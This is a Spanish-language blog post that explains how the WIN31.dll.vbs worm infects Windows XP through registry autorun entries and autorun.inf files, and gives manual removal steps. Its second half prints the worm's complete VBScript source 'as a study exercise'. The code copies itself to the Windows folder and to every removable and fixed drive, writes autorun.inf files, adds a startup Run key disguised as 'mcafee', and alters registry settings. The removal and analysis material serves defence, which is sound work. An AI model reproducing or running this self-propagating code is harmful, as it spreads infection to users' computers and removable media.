Ayer sin saber muy bien desde donde comenzó el antivirus a dar la turra con pasar el virus win31.dll.ws, la insistencia en querer eliminarle evidenciaba que el virus estaba mejor instalado que el propio XP, así que ahora comenzaba el trabajo de desinstalarle
En principio el pájaro este no deja de ser uno de los miles de fallos de seguridad el propio xp, el programilla en cuestión se aprovecha de un script hecho en vscript, y se copia en el directorio c:\windows, o donde se haya instalado el sistema operativo, luego crea que existan las entradas en el registro, en principio busca las unidades dentro del registro y genera una entrada del siguiente modo:
HCURRENT_USER\Software\Windows\CurrentVersion\Explorer\MountPoint2\
aquí se encuentran las unidades de disco identificadas con nombres como {1db9233e-0a99-11dc-8cde-005056c00008}
dentro de las unidades crea el siguiente registro:
Shell\AutoRun\Command
(Predeterminado) =C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe WIN31.dll.vbs
De tal forma que cuando se quiera abrir una unidad de disco con el dobleclick, se ejecute el script win31.dll.vbs
Pero ahi no queda la cosa, tambien va creando a su paso todo los autorun.inf con un contenido como este:
[autorun]
shellexecute=wscript.exe WIN31.dll.vbs
que viene a hacer básicamente lo mismo pero a nivel de carpeta, el autorun.inf, se diseño para que al hacer dobleclick en una carpeta se ejecutase un comando por defecto, generalmente le arranque de un programa de setup, este virus le usa para instalarse en el sistema.
Resumiendo que la forma de quitarlo es relativamente sencilla
-
Desde el administrador de tareas “finalizar” wsscript.exe, que es quien ejecuta el script
-
buscar los ficheros llamados win31.dll.ws, y eliminarlos
-
eliminar todas los autorun.inf que hagan referencia a win31.dll.ws; esto no es necesario pero si recomendable
-
eliminar las entradas del registro “shell\autorun\command”
aquí dejo una copia del virus/script resulta interesante como ejercicio de estudio:
on error resume next
Rem 121206, do u still remember dis day us_3?
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd:atr = «[autorun]»&vbcrlf&»shellexecute=wscript.exe WIN31.dll.vbs»:Set fs = CreateObject(«Scripting.FileSystemObject»): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
Do: Set winpath = fs.getspecialfolder(0): Set tf = fs.getfile(winpath & «\WIN31.dll.vbs»): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & «\WIN31.dll.vbs», 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & «\WIN31.dll.vbs»): tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path «A:» Then: Set tf = fs.getfile(flashdrive.Path & «\WIN31.dll.vbs»): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & «\WIN31.dll.vbs», 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & «\WIN31.dll.vbs»): tf.Attributes = 39: Set tf = fs.getfile(flashdrive.Path & «\autorun.inf»): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & «\autorun.inf», 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & «\autorun.inf»): tf.Attributes = 39: End If
Next
Set rg = CreateObject(«WScript.Shell»): rg.regwrite «HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee»,winpath & «\WIN31.dll.vbs»: rg.regwrite «HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title», «BANTAI USA & EZRAEL [AL – MUKHLIS STUDIO]»: rg.regwrite «HKCR\vbsfile\DefaultIcon», «shell32.dll,2»
If check 1 Then Wscript.sleep 200000
Loop While check 1: Set sd = CreateObject(«Wscript.shell»): sd.run winpath & «\explorer.exe /e,/select, » & Wscript.ScriptFullname